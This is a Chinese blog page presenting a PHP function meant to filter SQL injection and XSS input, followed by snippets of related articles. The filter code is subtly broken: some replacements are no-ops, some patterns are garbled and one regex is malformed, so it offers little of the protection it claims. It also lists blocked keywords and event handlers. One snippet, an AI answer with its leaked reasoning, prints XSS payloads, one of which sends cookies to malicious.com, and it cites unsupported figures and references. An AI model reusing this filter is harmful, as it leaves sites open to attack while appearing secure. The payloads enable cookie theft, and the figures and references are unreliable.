PHP进行安全字段和防止XSS跨站脚本攻击过滤(通用版)

最新推荐文章于 2025-06-12 00:16:09 发布
最新推荐文章于 2025-06-12 00:16:09 发布
阅读量1.1k 收藏
点赞数 1
分类专栏: php
本文介绍了一种用于PHP的安全字段过滤方法,通过正则表达式匹配并替换潜在的SQL注入和XSS攻击字符串。该方法能有效阻止常见的安全威胁。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

使用方式:1)写在公共方法里面,随时调用即可。2)写入类文件,使用是include_once 即可

/* 进行安全字段和xss跨站脚本攻击过滤(通用版) -xzz  */
function escape($string) {
    global $_POST;
    $search = array (
        '/</i',
        '/>/i',
        '/\">/i',
        '/\bunion\b/i',
        '/load_file(\s*(\/\*.*\*\/)?\s*)+\(/i',
        '/into(\s*(\/\*.*\*\/)?\s*)+outfile/i',
        '/\bor\b/i',
        '/\<([\/]?)script([^\>]*?)\>/si',
        '/\<([\/]?)iframe([^\>]*?)\>/si',
        '/\<([\/]?)frame([^\>]*?)\>/si'
    );
    $replace = array (
        '<',
        '>',
        '">',
        'union ',
        'load_file  (',
        'into  outfile',
        'or ',
        '<\\1script\\2>',
        '<\\1iframe\\2>',
        '<\\1frame\\2>'
    );
    if (is_array ( $string )) {
        $key = array_keys ( $string );
        $size = sizeof ( $key );
        for($i = 0; $i < $size; $i ++) {
            $string [$key [$i]] = escape ( $string [$key [$i]] );
        }
    } else {
        if (! $_POST ['stats_code'] && ! $_POST ['ad_type_code_content']) {
            $string = str_replace ( array (
                '\n',
                '\r'
            ), array (
                chr ( 10 ),
                chr ( 13 )
            ), preg_replace ( $search, $replace, $string ) );
            $string = remove_xss ( $string );
        } else {
            $string = $string;
        }
    }
    return $string;
}

function remove_xss($val) {
    $val = preg_replace ( '/([\x00-\x08\x0b-\x0c\x0e-\x19])/', '', $val );

    $search = 'abcdefghijklmnopqrstuvwxyz';
    $search .= 'ABCDEFGHIJKLMNOPQRSTUVWXYZ';
    $search .= '1234567890!@#$%^&*()';
    $search .= '~`";:?+/={}[]-_|\'\\';
    for($i = 0; $i < strlen ( $search ); $i ++) {

        $val = preg_replace ( '/(&#[xX]0{0,8}' . dechex ( ord ( $search [$i] ) ) . ';?)/i', $search [$i], $val );

        $val = preg_replace ( '/(�{0,8}' . ord ( $search [$i] ) . ';?)/', $search [$i], $val );
    }

    $ra1 = array (
        'javascript',
        'vbscript',
        'expression',
        'applet',
        'meta',
        'xml',
        'blink',
        'script',
        'object',
        'iframe',
        'frame',
        'frameset',
        'ilayer',
        'bgsound'
    );
    $ra2 = array (
        'onabort',
        'onactivate',
        'onafterprint',
        'onafterupdate',
        'onbeforeactivate',
        'onbeforecopy',
        'onbeforecut',
        'onbeforedeactivate',
        'onbeforeeditfocus',
        'onbeforepaste',
        'onbeforeprint',
        'onbeforeunload',
        'onbeforeupdate',
        'onblur',
        'onbounce',
        'oncellchange',
        'onchange',
        'onclick',
        'oncontextmenu',
        'oncontrolselect',
        'oncopy',
        'oncut',
        'ondataavailable',
        'ondatasetchanged',
        'ondatasetcomplete',
        'ondblclick',
        'ondeactivate',
        'ondrag',
        'ondragend',
        'ondragenter',
        'ondragleave',
        'ondragover',
        'ondragstart',
        'ondrop',
        'onerror',
        'onerrorupdate',
        'onfilterchange',
        'onfinish',
        'onfocus',
        'onfocusin',
        'onfocusout',
        'onhelp',
        'onkeydown',
        'onkeypress',
        'onkeyup',
        'onlayoutcomplete',
        'onload',
        'onlosecapture',
        'onmousedown',
        'onmouseenter',
        'onmouseleave',
        'onmousemove',
        'onmouseout',
        'onmouseover',
        'onmouseup',
        'onmousewheel',
        'onmove',
        'onmoveend',
        'onmovestart',
        'onpaste',
        'onpropertychange',
        'onreadystatechange',
        'onreset',
        'onresize',
        'onresizeend',
        'onresizestart',
        'onrowenter',
        'onrowexit',
        'onrowsdelete',
        'onrowsinserted',
        'onscroll',
        'onselect',
        'onselectionchange',
        'onselectstart',
        'onstart',
        'onstop',
        'onsubmit',
        'onunload'
    );
    $ra = array_merge ( $ra1, $ra2 );

    $found = true;
    while ( $found == true ) {
        $val_before = $val;
        for($i = 0; $i < sizeof ( $ra ); $i ++) {
            $pattern = '/';
            for($j = 0; $j < strlen ( $ra [$i] ); $j ++) {
                if ($j > 0) {
                    $pattern .= '(';
                    $pattern .= '(&#[xX]0{0,8}([9ab]);)';
                    $pattern .= '|';
                    $pattern .= '|(�{0,8}([9|10|13]);)';
                    $pattern .= ')*';
                }
                $pattern .= $ra [$i] [$j];
            }
            $pattern .= '/i';
            $replacement = substr ( $ra [$i], 0, 2 ) . ' ' . substr ( $ra [$i], 2 );
            $val = preg_replace ( $pattern, $replacement, $val );
            if ($val_before == $val) {

                $found = false;
            }
        }
    }
    return $val;
}

XSS(跨站脚本攻击)
guowu666的博客
06-10 2956
xss基础
PHP中如何防范跨站脚本攻击XSS)?有哪些防护措施?
aronSandy的博客
04-25 1552
通过综合运用这些措施,可以显著降低XSS攻击的风险,并提升应用程序的整体安全性。攻击者将恶意脚本注入到用户提交的表单字段、URL参数或其他可编辑的内容中,当用户访问被污染的页面时,恶意脚本将在用户的浏览器中执行。例如,设置Content-Security-Policy(CSP)响应头可以限制页面中允许加载的外部资源,从而防止恶意脚本的注入执行。同时,使用PHP的内置函数(如htmlspecialchars()、strip_tags()等)对输入数据进行过滤,可以转义或删除可能引发XSS攻击的字符标签。
利用PHP编程防范XSS跨站脚本攻击
03-04
国内不少论坛都存在跨站脚本漏洞,国外也很多这样的例子。跨站攻击很容易就可以构造,而且非常隐蔽,不易被查觉(通常盗取信息后马上跳转回原页面)。在此主要谈谈如何防范。首先,跨站脚本攻击都是由于对用户的输入没有进行严格的过滤造成的,所以我们必须在所有数据进入我们的网站数据库之前把可能的危险拦截。针对非法的HTML代码包括单双引号等,可以使用htmlentities()
PHP防止XSS(跨站脚本攻击)的主要方法
深山技术宅的博客
06-12 418
PHPXSS攻击方案摘要(148字): PHP防范XSS攻击的核心措施包括:使用htmlspecialchars()或htmlentities()转义HTML输出,设置Content Security Policy(CSP)头部限制脚本来源,通过filter_var()过滤输入数据。推荐采用模板引擎自动转义,并设置HTTP-only Cookie保护敏感信息。最佳实践强调输入验证、输出转义白名单机制,特别需警惕用户输入直接输出到HTML、JavaScript、URL或CSS的场景。同时应保持PHP及依赖
PHP - 防止 XSS跨站脚本攻击
weixin_30347335的博客
01-17 213
<?PHP /** * @blog http://www.phpddt.com * @param $string * @param $low 安全别级低 */ function clean_xss(&$string, $low = False) { if (! is_array ( $string )) { $string = tri...
php 防止跨站脚本攻击,如何应用php防止XSS跨站脚本攻击
weixin_42498206的博客
03-09 647
如何应用php防止XSS跨站脚本攻击发表于2019-05-16 14:50|次阅读|来源网络整理|作者session摘要:如何应用php防止XSS跨站脚本攻击如何应用php防止XSS跨站脚本攻击首先,跨站脚本攻击都是因为对用户的输入没有停止严厉的过滤形成的,所以咱们必须在一切数据进入咱们的网站数据库之前把能够的风险阻拦。针对非法的HTML代码包括单双引号等,可能利用htmlentities()函...
php安全(二):xss攻击
llllllloooooo的博客
05-29 425
   XSS 全称为 Cross Site Scripting,跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,进而达到某些人的攻击目的。分类1、XSS反射型攻击,恶意代码并没有保存在目标网站,通过引诱用户点击一个链接到目标网站的恶意链接来实施攻击的。2、XSS存储型攻击,恶意代码被保存到目标网站的服务器中,这种攻击...
Laravel5中防止XSS跨站攻击的方法
10-21
在Web开发中,跨站脚本攻击XSS攻击)是一种常见的安全威胁,攻击者通过注入恶意脚本代码到网页中,以达到窃取信息、破坏网站功能等目的。Laravel作为PHP的一种框架,为了增强安全性,在其5.0版本中提供了集成扩展...
跨站脚本攻击XSS
qq_45557130的博客
10-16 1505
xss
跨站脚本攻击XSS)详解
2402_86725606的博客
01-05 1813
跨站脚本攻击XSS,Cross-Site Scripting)是一种通过在网页中注入恶意脚本,攻击用户浏览器的漏洞。攻击者可以利用XSS窃取用户敏感信息、劫持会话、或在受害者浏览器中执行恶意操作。通过及时识别修复漏洞、使用安全编码实践部署防御技术,可以有效预防XSS攻击的发生。
跨站脚本攻击字符过滤
07-25
用这个办法,可以过滤在输入中含有 % [ ] { } ; & + - " ( ) 的这些字符。
php跨站ip,PHP跨站脚本过滤RemoveXss函数
weixin_42166918的博客
03-10 550
RemoveXss函数主要用于跨站脚本过滤//Removetheexploer'bugXSSfunctionRemoveXSS($val){//removeallnon-printablecharacters.CR(0a)andLF(0b)andTAB(9)areallowed//thispreventssomecharacterre-spacings...
PHP跨站脚本攻击XSS)防范方案
m0_66326520的博客
04-09 1672
反射型XSS攻击是将注入的恶意脚本添加到一个网址中,然后给用户发送这个网址。一旦用户打开这个网址,就会执行脚本并导致攻击。攻击负载脚本跟随用户点击链接,并被嵌入到响应中,在浏览器上执行。存储型 XSS 攻击指的是攻击者将恶意脚本提交到受害网站的数据库中,当其他用户浏览包含该恶意脚本链接的页面时,就会执行该脚本,从而导致攻击者的目的得以实现。由于是将恶意脚本保存在数据库中,所有访问包含恶意代码的页面的用户都受到攻击。而且这种攻击方式难解决。
PHP 安全:如何防止PHP中的XSS
新华编程特战队
04-24 1437
跨站点脚本(XSS) 是一种严重的安全漏洞,允许恶意行为者将恶意脚本引入网站,使毫无戒心的访问者处于危险之中。使用 XSS,攻击者可以在受害者的 Web 浏览器中执行任意代码,可能导致敏感数据被盗、未经授权的访问或网站污损。本文旨在深入探讨 XSS 攻击的主要形式,阐明其根本原因,探索 XSS 利用的潜在后果,并深入了解防止 PHPXSS 攻击的有效措施。当恶意行为者成功将有害脚本插入受信任的网站时,就会发生跨站脚本XSS) 攻击。这些受感染的网站在不知不觉中将注入的脚本提供给毫无戒心的用户。
pdo如何防止 sql注入
weixin_34378969的博客
01-26 284
我们使用传统的 mysql_connect 、mysql_query方法来连接查询数据库时,如果过滤不严,就有SQL注入风险,导致网站被攻击,失去控制。虽然可以用mysql_real_escape_string()函数过滤用户提交的值,但是也有缺陷。而使用PHP的PDO扩展的 prepare 方法,就可以避免sql injection 风险。  使用PDO访问MySQL数据库时,真正的real ...
PHP后端安全性:如何防止SQL注入跨站脚本攻击
ElvaRaleign的博客
04-25 1899
然而,安全性是一个持续的过程,我们需要保持警惕,及时关注最新的安全威胁漏洞信息,不断更新改进我们的安全措施。SQL注入攻击是指攻击者通过在应用程序的输入字段中插入或“注入”恶意的SQL代码,从而操纵后端数据库的执行。跨站脚本攻击XSS)是指攻击者通过注入恶意脚本到Web页面中,当其他用户访问该页面时,恶意脚本会在用户的浏览器中执行,从而窃取用户信息、执行恶意操作或进行钓鱼攻击等。通过配置CSP,可以指定允许加载的脚本、样式资源的来源,从而防止来自不可信来源的恶意脚本执行。等能够执行动态代码的函数。
简单的PDO技术以及预处理方法预防SQL注入
qq_43592364的博客
09-22 1426
SQL注入是十大漏洞之一,危害程度高,可能会导致数据库中的信息泄露,用户得到管理员权限等安全隐患 产生SQL注入点的原因有多种多样,但归根结底是采用了动态拼接SQL语句的方法并且没有做好相应的过滤用户数据的措施,例如 <?php $name = $_POST['userName']; $password = $_POST['userPassword']; if...
xss跨站脚本攻击成功的详解修复
最新发布
07-17
<think>首先,用户的问题是关于XSS跨站脚本攻击)的:他们想了解原理详解修复方法。系统指令要求我使用中文回答,确保LaTeX语法正确(行内数学表达式用$...$,独立公式用$$...$$),并生成相关问题。最后,添加引用标识。 参考提供的引用: - 引用[1]:解释了XSS的基本概念:恶意攻击者向Web页面插入恶意script代码,当用户浏览时,代码被执行。 - 引用[2]:提到XSS原理详解,包括攻击实例工具,如xss平台、beef等。 用户的问题焦点是:XSS成功利用的原理及其详细修复方法。所以,我需要覆盖: 1. **原理**:解释XSS如何工作,包括类型(如反射型、存储型、DOM型)。 2. **成功利用的原理**:攻击者如何注入脚本,用户如何触发,以及后果(如窃取cookie、会话劫持)。 3. **修复方法**:详细的方法,如输入验证、输出编码、使用安全HTTP头(如Content Security Policy)。 结构化回答: - 开头简要介绍XSS。 - 然后分节:原理部分(包括成功利用的关键点)修复方法部分。 - 结尾生成相关问题。 确保回答真实可靠:基于我的知识,XSS原理包括: - 攻击者注入恶意脚本到Web应用中。 - 类型:反射型(URL参数反射)、存储型(持久化存储)、DOM型(客户端处理)。 - 成功利用:当用户访问特定页面时,脚本在浏览器执行,可能导致数据窃取、重定向等。 - 修复:输入过滤、输出编码、CSP、使用框架安全功能等。 在回答中,引用提供的引用[1][2],但用户说“上述引用仅供参考”,所以我应该基于这些构建,但不要过度依赖。引用[1]定义了XSS,引用[2]提到原理工具。我可以自然地融入。 添加引用标识:在相关段落末尾添加[^1]或[^2]。例如,解释原理时引用[1],提到工具时引用[2]。 生成相关问题:在回答结束时,添加“§§相关问题§§”部分,列出3-5个相关问题。 格式要求: - 行内数学表达式:如果有数学内容,如计算概率,但XSS可能不涉及太多数学,所以可能不需要。如果有,比如提到编码时,用$...$。 - 独立公式:如果需要,用$$...$$单独成段。 - 中文回答。 回答结构: 1. **介绍**:简要定义XSS。 2. **原理详解**:解释攻击过程、类型、成功利用的关键。 3. **修复方法**:详细列出并解释方法。 4. **相关问题**:生成相关问题。 大纲: - 开头:XSS跨站脚本攻击,恶意脚本被注入执行。 - 原理部分: - 攻击者如何注入:通过用户输入点(如表单、URL)。 - 类型:反射型、存储型、DOM型。 - 成功利用:脚本执行在受害者浏览器中,导致会话劫持、钓鱼等。 - 修复方法: - 输入验证:过滤验证用户输入。 - 输出编码:在输出到HTML时编码特殊字符。 - 使用CSP(Content Security Policy)。 - 其他:如设置HttpOnly标志、使用安全框架。 - 结尾:相关问题。 生成相关问题: 1. XSS攻击的常见工具有哪些? 2. 如何测试Web应用中的XSS漏洞? 3. XSS与其他Web攻击(如CSRF)的区别是什么? 确保引用: - 在定义XSS时,引用[^1]。 - 在提到原理或工具时,引用[^2]。 最终回答:</think>### XSS跨站脚本攻击原理详解及修复方法 XSS跨站脚本攻击)是一种常见的Web安全漏洞,攻击者通过注入恶意脚本到Web页面中,当用户浏览该页面时,脚本在用户浏览器中执行,从而窃取数据、劫持会话或发起进一步攻击[^1]。下面我将逐步解释XSS成功利用的原理,并提供详细的修复方法。回答基于可靠的安全实践,确保内容真实。 #### XSS成功利用的原理详解 XSS攻击的核心在于攻击者能够将恶意脚本注入到Web应用的输出流中,并在用户浏览器中执行。成功利用的关键步骤如下: 1. **注入点识别**:攻击者寻找Web应用中未经验证的用户输入点,如表单字段、URL参数、Cookie或HTTP头部。例如,在搜索框中输入恶意脚本: ```html <script>alert('XSS')</script> ``` 如果应用未处理此输入,脚本会被反射或存储。 2. **脚本注入与执行**:根据XSS类型,注入方式不同: - **反射型XSS**:恶意脚本通过URL参数传递,服务器“反射”回页面。例如,用户点击一个恶意链接: ``` http://example.com/search?query=<script>document.location='http://malicious.com/steal?cookie='+document.cookie</script> ``` 当用户访问此URL时,脚本执行,窃取Cookie[^1]。 - **存储型XSS**:脚本被永久存储到数据库(如评论区),所有访问该页面的用户都会触发执行。例如,攻击者在论坛帖子中注入脚本,窃取登录凭证。 - **DOM型XSS**:攻击利用客户端JavaScript处理漏洞(如`document.write`或`innerHTML`),无需服务器参与。脚本通过修改DOM树执行,例如: ```javascript document.getElementById('output').innerHTML = unescape(location.hash.substring(1)); ``` 如果URL为`example.com#<img src=x onerror=alert(1)>`,脚本会被执行。 3. **成功利用的条件**: - **用户交互**:受害者必须访问包含恶意脚本的页面(如点击钓鱼链接)。 - **浏览器执行**:脚本在用户浏览器中运行,利用同源策略绕过限制,访问敏感数据(如Cookie、会话令牌)。 - **攻击后果**:可能导致会话劫持、数据窃取(如密码)、钓鱼攻击或安装恶意软件。例如,使用工具如BeEF(Browser Exploitation Framework)可远程控制受害者浏览器[^2]。 XSS攻击的成功率取决于Web应用的安全防护强度。攻击者常使用平台如XSS平台或工具如XSStrike进行自动化测试[^2]。 #### 详细修复方法 修复XSS漏洞需要多层次的防御策略,确保用户输入被安全处理。以下是关键方法,适用于开发安全运维: 1. **输入验证与过滤**: - **原理**:在服务器端对用户输入进行严格验证,只允许安全字符(如字母、数字)。使用正则表达式过滤或删除危险字符(如`<`, `>`, `&`)。 - **实现**:例如,在PHP中使用`filter_var`函数: ```php $input = filter_var($_POST['input'], FILTER_SANITIZE_STRING); ``` - **最佳实践**:结合白名单验证(只允许已知安全模式),避免黑名单(易被绕过)。 2. **输出编码**: - **原理**:在将数据输出到HTML、JavaScript或URL时,对特殊字符进行编码,防止脚本执行。例如,将`<`转换为`<`。 - **实现**: - **HTML上下文**:使用函数如`htmlspecialchars`(PHP)或框架内置方法: ```php echo htmlspecialchars($user_input, ENT_QUOTES, 'UTF-8'); ``` - **JavaScript上下文**:使用`JSON.stringify`或专用库: ```javascript var safeOutput = JSON.stringify(untrustedData); ``` - **URL上下文**:编码参数,如JavaScript的`encodeURIComponent`。 3. **使用Content Security Policy (CSP)**: - **原理**:通过HTTP头部定义可信来源,限制脚本执行。CSP阻止内联脚本外部恶意资源。 - **实现**:在服务器响应头中添加: ``` Content-Security-Policy: default-src 'self'; script-src 'self' https://trusted.cdn.com; ``` 这确保脚本只从`self`或指定CDN加载,减少XSS风险[^1]。 4. **其他安全措施**: - **设置HttpOnly标志**:在Cookie中添加`HttpOnly`属性,防止JavaScript访问: ``` Set-Cookie: sessionID=123; HttpOnly; Secure ``` - **框架安全功能**:使用现代Web框架(如React或Angular),它们内置XSS防护(如自动编码)。避免直接操作DOM。 - **定期安全测试**:使用工具如Burp Suite或XSStrike扫描漏洞,并结合渗透测试[^2]。 - **用户教育**:提醒用户避免点击可疑链接,减少反射型XSS风险。 修复XSS需要持续监控更新,因为攻击技术不断演进。结合以上方法,可显著降低风险。例如,输入验证输出编码能阻止90%以上的XSS漏洞[^1]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值